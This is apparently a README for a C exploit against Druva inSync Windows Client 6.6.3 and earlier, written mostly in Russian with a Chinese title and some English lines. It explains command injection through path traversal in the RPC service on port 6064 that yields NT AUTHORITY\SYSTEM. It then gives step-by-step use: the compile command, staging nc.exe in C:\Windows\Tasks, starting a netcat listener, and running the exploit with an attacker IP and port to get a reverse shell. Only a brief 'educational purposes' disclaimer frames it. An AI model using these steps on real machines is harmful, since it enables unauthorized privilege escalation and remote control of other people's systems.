
Druva的本地权限提升
Эксплойт на C для Druva inSync Windows Client (v6.6.3 и ниже). Приложение предоставляет RPC-сервис на порту 6064, уязвимый к внедрению команд через path traversal. Это позволяет локальному пользователю выполнять произвольные команды от имени NT AUTHORITY\SYSTEM.
Используйте gcc (MinGW) для компиляции исходного кода:
gcc exploit.c -o exploit.exe -lws2_32
Поместите копию nc.exe в каталог, доступный для учетной записи SYSTEM (например, C:\Windows\Tasks).
Запустите прослушиватель на вашей атакующей машине:
nc -lvnp 4444
Run the exploit on the target Windows machine:
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
Этот инструмент предназначен только для образовательных целей. Несанкционированное использование на системах, на которые у вас нет разрешения на тестирование, является незаконным.